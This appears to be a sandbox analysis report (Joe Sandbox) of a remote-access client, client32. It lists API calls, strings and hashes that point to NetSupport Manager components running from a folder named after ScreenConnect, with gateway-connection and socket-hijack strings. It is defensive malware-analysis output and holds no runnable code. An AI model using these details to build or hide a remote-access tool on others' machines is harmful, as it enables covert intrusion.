Part of subcall function 6CC7F8CB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6CC8B131,6CC84BF1,00000001,6CC84BF1,?,6CC8D1B5,00000018,6CCA5558,0000000C,6CC8D245), ref: 6CC7F910

_memset.LIBCMT ref: 6CC7583D
_malloc.LIBCMT ref: 6CC75890
_memset.LIBCMT ref: 6CC758C6
_malloc.LIBCMT ref: 6CC758D2
_memset.LIBCMT ref: 6CC75908
GetTickCount.KERNEL32 ref: 6CC75966
CreateThread.KERNEL32(00000000,00004000,6CC751C0,00000000,00000000,6CCA9ACC), ref: 6CC75983
SetThreadPriority.KERNEL32(00000000,00000001), ref: 6CC759B1
GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\MScreenConnect\Support\,00000104), ref: 6CC759E9
GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\ProgramData\MScreenConnect\Support\pci.ini), ref: 6CC75A70
GetModuleHandleA.KERNEL32(nsmtrace), ref: 6CC75A80

Strings

HTCTL32, xrefs: 6CC75696
TraceFile, xrefs: 6CC75AF7
*DisconnectTimeout, xrefs: 6CC7593F
sv.hRecvThreadReadyEvent, xrefs: 6CC75764
pci.ini, xrefs: 6CC75A4F
C:\ProgramData\MScreenConnect\Support\, xrefs: 6CC759E3, 6CC759F1, 6CC75A05
NSM896597, xrefs: 6CC7585D
TraceSend, xrefs: 6CC75A9B, 6CC75AD4
nsmtrace, xrefs: 6CC75A76
WinInet.dll, xrefs: 6CC756B2
Support\, xrefs: 6CC75A0A
*CMPI, xrefs: 6CC75924
sv.subset.subset, xrefs: 6CC758AB
htctl.packet_tracing, xrefs: 6CC75A68
sv.s, xrefs: 6CC75828
TraceRecv, xrefs: 6CC75A8F, 6CC75ABD
sv.ResumeEvent, xrefs: 6CC757B0
sv.hRecvThread, xrefs: 6CC7599C
580913, xrefs: 6CC75848
e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c, xrefs: 6CC7575F, 6CC75785, 6CC757AB, 6CC75823, 6CC758A6, 6CC758E8, 6CC75997, 6CC759C2
General, xrefs: 6CC75944
mode, xrefs: 6CC75A61
_debug, xrefs: 6CC75AC2, 6CC75AD9, 6CC75AFC, 6CC75B0C
C:\ProgramData\MScreenConnect\Support\pci.ini, xrefs: 6CC75A41, 6CC75A5B
sv.hResponseEvent, xrefs: 6CC7578A
Trace, xrefs: 6CC75B07
(iflags & CTL_REMOTE) == 0, xrefs: 6CC759C7
sv.subset.omit, xrefs: 6CC758ED

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: Create_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateCountCriticalHandleHeapInitializeLibraryLoadPriorityPrivateProfileSectionStartupTick
String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$580913$C:\ProgramData\MScreenConnect\Support\$C:\ProgramData\MScreenConnect\Support\pci.ini$General$HTCTL32$NSM896597$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
API String ID: 2219067882-778736681
Opcode ID: 5663ebc50f3eb194c79126c522ec29306472b133c4a4a7d3e4afad7766d406bf
Instruction ID: b5d8d7222d60fff5395e1ee2c6e335ff34c1dff243ae479ff934e9295d73905b
Opcode Fuzzy Hash: 5663ebc50f3eb194c79126c522ec29306472b133c4a4a7d3e4afad7766d406bf
Instruction Fuzzy Hash: 57C109B0A00305AFDB10EFB5ACC995A7BF8FB06358B144929F446D7F02F73299458BA5

Function 1110E3D0 Relevance: 79.4, APIs: 23, Strings: 22, Instructions: 634COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 1110E422
SystemParametersInfoA.USER32(00000025,00000000,00000000,00000000), ref: 1110E438
SystemParametersInfoA.USER32(00000026,00000000,0261ECB8,00000000), ref: 1110E44A
SystemParametersInfoA.USER32(00000049,00000008,00000008,00000000), ref: 1110E4A0
SystemParametersInfoA.USER32(00000048,00000008,00000008,00000000), ref: 1110E4B5
SystemParametersInfoA.USER32(00001002,00000000,0261ECC8,00000000), ref: 1110E519
SystemParametersInfoA.USER32(00001005,00000000,00000000,00000000), ref: 1110E55F
SystemParametersInfoA.USER32(00001004,00000000,0261ECC0,00000000), ref: 1110E577
SystemParametersInfoA.USER32(00001007,00000000,00000000,00000000), ref: 1110E5BD
SystemParametersInfoA.USER32(00001006,00000000,0261ECC4,00000000), ref: 1110E5D5
SystemParametersInfoA.USER32(0000101B,00000000,00000000,00000000), ref: 1110E61B
SystemParametersInfoA.USER32(0000101A,00000000,0261ECCC,00000000), ref: 1110E633
SystemParametersInfoA.USER32(00001015,00000000,00000000,00000000), ref: 1110E679
SystemParametersInfoA.USER32(00001014,00000000,0261ECD0,00000000), ref: 1110E691
SystemParametersInfoA.USER32(00001017,00000000,00000000,00000000), ref: 1110E6D7
SystemParametersInfoA.USER32(00001016,00000000,0261ECD4,00000000), ref: 1110E6EF
SystemParametersInfoA.USER32(00001025,00000000,00000000,00000000), ref: 1110E735
SystemParametersInfoA.USER32(00001024,00000000,0261ECD8,00000000), ref: 1110E74D
SystemParametersInfoA.USER32(00001009,00000000,00000000,00000000), ref: 1110E7FF
SystemParametersInfoA.USER32(00001008,00000000,0261ECE0,00000000), ref: 1110E817
SystemParametersInfoA.USER32(0000004B,00000000,00000000,00000000), ref: 1110E85A
SystemParametersInfoA.USER32(0000004A,00000000,0261ECE4,00000000), ref: 1110E86F
SystemParametersInfoA.USER32(00001003,00000000,00000000,00000000), ref: 1110E501

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

Strings

ListviewAlphaSelect, xrefs: 1110E918, 1110E933
EnableLBSmoothScroll, xrefs: 1110E58D
ListviewShadow, xrefs: 1110EA44, 1110EA64
EnableLVAlphaSelect, xrefs: 1110E8EF
EnableMenuAnimation, xrefs: 1110E4D1
EnableLVWatermark, xrefs: 1110E9B7
ListviewWatermark, xrefs: 1110E9E0, 1110E9FB
EnableLVShadow, xrefs: 1110EA1B
EnableCBAnimation, xrefs: 1110E52F
EnableTTAnimation, xrefs: 1110E6A7
EnableDragFullWindows, xrefs: 1110E3F8
EnableFontSmoothing, xrefs: 1110E82D
EnableAnimation, xrefs: 1110E46D
EnableGradientCaptions, xrefs: 1110E7CF
EnableShadowCursor, xrefs: 1110E5EB
EnableTVSmoothScroll, xrefs: 1110E763
TaskbarAnimations, xrefs: 1110E97C, 1110E997
EnableIESmoothScroll, xrefs: 1110E885
SmoothScroll, xrefs: 1110E78E, 1110E7AD, 1110E8AE, 1110E8C9
EnableDropShadow, xrefs: 1110E705
EnableTBAnimations, xrefs: 1110E953
EnableSelectionFade, xrefs: 1110E649

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: System$InfoParameters$Metrics__wcstoi64
String ID: EnableAnimation$EnableCBAnimation$EnableDragFullWindows$EnableDropShadow$EnableFontSmoothing$EnableGradientCaptions$EnableIESmoothScroll$EnableLBSmoothScroll$EnableLVAlphaSelect$EnableLVShadow$EnableLVWatermark$EnableMenuAnimation$EnableSelectionFade$EnableShadowCursor$EnableTBAnimations$EnableTTAnimation$EnableTVSmoothScroll$ListviewAlphaSelect$ListviewShadow$ListviewWatermark$SmoothScroll$TaskbarAnimations
API String ID: 3799663137-3751266815
Opcode ID: e7a4dce61e0f6dc888a7ab4a6d4f103cf71d0abfd572eaa5a0d6346dd09f0406
Instruction ID: 9f95c093d5af311da67ec9eb410866abb6d77f64e7d878690f97347aefdc1e61
Opcode Fuzzy Hash: e7a4dce61e0f6dc888a7ab4a6d4f103cf71d0abfd572eaa5a0d6346dd09f0406
Instruction Fuzzy Hash: 0D12C434A02B56BAF7208B67CE44FABFBA5ABC4B44F51441CF546AA1C0EBB4F580C754

Function 1105D550 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON

Download Yara Rule

APIs

Part of subcall function 11134260: GetLastError.KERNEL32(?,00000000,75A7795C,00000000), ref: 11134295
Part of subcall function 11134260: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,75A7795C,00000000), ref: 111342A5

_fgets.LIBCMT ref: 1105D682
_strpbrk.LIBCMT ref: 1105D6E9
_fgets.LIBCMT ref: 1105D7EC
_strpbrk.LIBCMT ref: 1105D863
__wcstoui64.LIBCMT ref: 1105D87C
_fgets.LIBCMT ref: 1105D8F5
_strpbrk.LIBCMT ref: 1105D91B

Strings

shrink_wrap, xrefs: 1105DEF6
product, xrefs: 1105DF12
_License, xrefs: 1105DC16, 1105DCD4, 1105DCEE, 1105DE76, 1105DEE0, 1105DEFB, 1105DF17, 1105E011, 1105E230, 1105E318
%c%04d%s, xrefs: 1105DA44
Client, xrefs: 1105DB22, 1105DB64
?starT, xrefs: 1105E031, 1105E03D
licensee, xrefs: 1105E313
start, xrefs: 1105DFF9, 1105E010
_checksum, xrefs: 1105DCCF
defaults, xrefs: 1105D9D6
_include, xrefs: 1105DA89
/- , xrefs: 1105E0BE, 1105E0F1, 1105E124
_version, xrefs: 1105DCE9
Expired, xrefs: 1105E22B
expiry, xrefs: 1105DFF0
inactive, xrefs: 1105DE71
?expirY, xrefs: 1105E028
%s.%04d.%s, xrefs: 1105DB69
cd_install, xrefs: 1105DEDB
ACM, xrefs: 1105DF57
enforce, xrefs: 1105D9F6

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
API String ID: 716802716-1571441106
Opcode ID: b36b250b60a2e9cd4f06500322bd86e2a853e76f953578539bcda6e14bd9671a
Instruction ID: 4e0492978d8d4243d04b01263315b5fbbceebc438647a9249f86b1f3f6260675
Opcode Fuzzy Hash: b36b250b60a2e9cd4f06500322bd86e2a853e76f953578539bcda6e14bd9671a
Instruction Fuzzy Hash: CAA2D475E006569FEB90DB64DC80BEFB7B5AF45305F0081D9E849A7280EB70AE85CF61

Function 6CC690A0 Relevance: 51.1, APIs: 25, Strings: 4, Instructions: 338
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6CC642F0: inet_ntoa.WSOCK32(00000080,?,00000000,?,6CC678D1,00000000,00000000,6CCA98DA,?,00000080), ref: 6CC64302

EnterCriticalSection.KERNEL32(6CCA9898,?,00000000,00000000,?,?,?,?,?,?,6CC71D39,00002000,?,000001BB,FFFFFFFF,?), ref: 6CC690F5
LeaveCriticalSection.KERNEL32(6CCA9898,?,?,?,?,?,?,6CC71D39,00002000,?,000001BB,FFFFFFFF,?,?,00000000,?), ref: 6CC6912D
LeaveCriticalSection.KERNEL32(6CCA9898,?,?,?,?,?,?,6CC71D39,00002000,?,000001BB,FFFFFFFF,?,?,00000000,?), ref: 6CC69159
WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,6CC71D39,00002000), ref: 6CC691AD
socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000,?,?,?,?,?,?,6CC71D39,00002000), ref: 6CC691F0
WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000,?,?,?,?,?,?,6CC71D39,00002000), ref: 6CC691FC
#21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC6922A
#21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC69247
#21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC69273
bind.WSOCK32(00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC69296
WSAGetLastError.WSOCK32(00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC6929F
closesocket.WSOCK32(00000000,00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC692A7
htons.WSOCK32(00000000,00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC692D7
WSASetBlockingHook.WSOCK32(6CC64E60,00000000,00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC692E5
WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC692FB
WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC69302
closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC69308
WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC6935A
WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC69361
closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC69367
WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC693A5
EnterCriticalSection.KERNEL32(6CCA9898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CC693B4
LeaveCriticalSection.KERNEL32(6CCA9898), ref: 6CC69438
GetTickCount.KERNEL32 ref: 6CC69444
InterlockedExchange.KERNEL32(6CC71CC9,00000000), ref: 6CC69452

Part of subcall function 6CC68CE0: wsprintfA.USER32 ref: 6CC68D37
Part of subcall function 6CC68CE0: inet_ntoa.WSOCK32(00000000), ref: 6CC68D43
Part of subcall function 6CC68CE0: _sprintf.LIBCMT ref: 6CC68D7D
Part of subcall function 6CC68CE0: _free.LIBCMT ref: 6CC68D83
Part of subcall function 6CC68CE0: GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 6CC68DCC
Part of subcall function 6CC68CE0: WSAGetLastError.WSOCK32 ref: 6CC68DF0

Strings

Connect error to %s using hijacked socket, error %d, xrefs: 6CC691B9
*TcpNoDelay, xrefs: 6CC6924E
Cannot connect to gateway %s via web proxy, error %d, xrefs: 6CC69371
Cannot connect to gateway %s, error %d, xrefs: 6CC69312

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: ErrorLast$CriticalSection$BlockingHook$LeaveUnhookclosesocket$Enterinet_ntoa$AddressCountExchangeInterlockedProcTick_free_sprintfbindhtonssocketwsprintf
String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
API String ID: 1690749424-2561115898
Opcode ID: 92db1312c0de8d9367a5b31391759b01baae4f2ef78268a6870523aa5e7af648
Instruction ID: 3b5e228ae31cb19aecb046f3674873ec23408d2e1226344b8350ae58ab0c8662
Opcode Fuzzy Hash: 92db1312c0de8d9367a5b31391759b01baae4f2ef78268a6870523aa5e7af648
Instruction Fuzzy Hash: 11B1D671A01108AFDB04CFA5D9C5BDDB7B5FF89314F10416AE9099BB80FB719905CBA1

Function 11129D80 Relevance: 44.1, APIs: 16, Strings: 9, Instructions: 380
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsWindow.USER32(00010486), ref: 11129E01
IsWindowVisible.USER32(00010486), ref: 11129E0F
IsWindowVisible.USER32(00010486), ref: 11129E47
GetForegroundWindow.USER32 ref: 11129E62
EnableWindow.USER32(00010486,00000000), ref: 11129E7C
EnableWindow.USER32(00010486,00000001), ref: 11129E98
SetForegroundWindow.USER32(00000000), ref: 11129EA7
FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11129EE5
IsWindowVisible.USER32(00000000), ref: 11129EF4
IsWindowVisible.USER32(00010486), ref: 11129F24
IsIconic.USER32(00010486), ref: 11129F31
GetForegroundWindow.USER32 ref: 11129F3B

Part of subcall function 111228E0: ShowWindow.USER32(00010486,11129D52,?,11129D52,00000007,?,?,?,?,?,00000000), ref: 111228EE

SetForegroundWindow.USER32(00000000), ref: 11129F61
EnableWindow.USER32(00010486,00000001), ref: 11129F70
GetLastError.KERNEL32 ref: 1112A02D
GetLastError.KERNEL32 ref: 1112A0A5

Strings

File <%s> doesnt exist, e=%d, xrefs: 1112A031, 1112A0A9
Shell_TrayWnd, xrefs: 11129EE0
disableRunplugin, xrefs: 11129FB2
Client, xrefs: 11129E35, 11129FB7
MainWnd = %08x, visible %d, valid %d, xrefs: 11129E19
Audio, xrefs: 1112A12C
HookDirectSound, xrefs: 1112A127
HideWhenIdle, xrefs: 11129E30
Reactivate main window, xrefs: 11129E55

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ForegroundVisible$Enable$ErrorLast$FindIconicShow
String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$Reactivate main window$Shell_TrayWnd$disableRunplugin
API String ID: 3497382234-2745087410
Opcode ID: 03e229f3001578359e413258553aba7f5d85a076d8a2a6da1e0c262e5ead9f6f
Instruction ID: 89bfc5eb453e7e361dc174284ec43732ba9e27439f8ef9c29a8ac0fe06485c00
Opcode Fuzzy Hash: 03e229f3001578359e413258553aba7f5d85a076d8a2a6da1e0c262e5ead9f6f
Instruction Fuzzy Hash: 0CD13435A01231AFDF10DF24DD89F9AF762AB80B4CFA04539EC1957288EF716840CB92

Function 11081000 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108108C
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110810AA
LoadLibraryA.KERNEL32(?), ref: 110810EC
GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11081107
GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108111C
GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108112D
GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108113E
GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108114F
GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11081160

Strings

CryptPak.dll, xrefs: 1108105B, 110810BE
CipherServer_Destroy, xrefs: 11081116
CipherServer_Create, xrefs: 11081101
CipherServer_GetRandomData, xrefs: 1108117C
CipherServer_GetInfoBlock, xrefs: 11081127
CipherServer_OpenSession, xrefs: 11081138
CipherServer_ResetSession, xrefs: 1108118D
CipherServer_DecryptBlocks, xrefs: 1108116B
CipherServer_EncryptBlocks, xrefs: 1108115A
CipherServer_CloseSession, xrefs: 11081149

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$FileModuleName
String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
API String ID: 2201880244-3035937465
Opcode ID: 0a76712465da8a1f89cb356c9f725acde3d7fc538e30262e756dcc55fc0ce3ce
Instruction ID: 5e0f03c7a272b42dabbdc436788095eb74915ed0ff03ab5e2eae34a55ab18380
Opcode Fuzzy Hash: 0a76712465da8a1f89cb356c9f725acde3d7fc538e30262e756dcc55fc0ce3ce
Instruction Fuzzy Hash: 7751B378E0870A9FD711DF7ACC90AA6FBF8AF55314B1189AED8A5C7640DA70E580CF50

Function 6CC71780 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 178timethreadCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,?,?,93355537,D7B0ED52,933554B7,FFFFFFFF,00000000), ref: 6CC71831
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6CC7183B
GetSystemTime.KERNEL32(?,D7B0ED52,933554B7,FFFFFFFF,00000000), ref: 6CC71875
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00002000), ref: 6CC7187F
EnterCriticalSection.KERNEL32(6CCA9898,?,93355537), ref: 6CC71909
LeaveCriticalSection.KERNEL32(6CCA9898), ref: 6CC7191B
GetCurrentThreadId.KERNEL32 ref: 6CC71990

Part of subcall function 6CC7A090: __strdup.LIBCMT ref: 6CC7A0AA

Part of subcall function 6CC7A170: _free.LIBCMT ref: 6CC7A19D

Strings

INFO=1, xrefs: 6CC7194C
1.1, xrefs: 6CC71888, 6CC71892
CMD=POLL, xrefs: 6CC7193C
ACK=1, xrefs: 6CC7195A

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: Time$System$CriticalFileSection$CurrentEnterLeaveThread__strdup_free
String ID: 1.1$ACK=1$CMD=POLL$INFO=1
API String ID: 1510130979-3441452530
Opcode ID: 943c6d7b363f6028a083401c6ab4c9729c2127586835526059653bdbef14e3d4
Instruction ID: c630f68efe11a8987ab7b43f354f6ccee8ca15fd472513eb4951afd7333fbd56
Opcode Fuzzy Hash: 943c6d7b363f6028a083401c6ab4c9729c2127586835526059653bdbef14e3d4
Instruction Fuzzy Hash: AD615D72900608AFDB14DFE5D894EEEB7B9FB49304F04461EE416A7A40FB34E509CBA1

Function 11134460 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 139registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetVersionExA.KERNEL32(111DC648,75A78400), ref: 11134490
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111344CF
_memset.LIBCMT ref: 111344ED

Part of subcall function 11132450: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A78400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470

_strncpy.LIBCMT ref: 111345AF

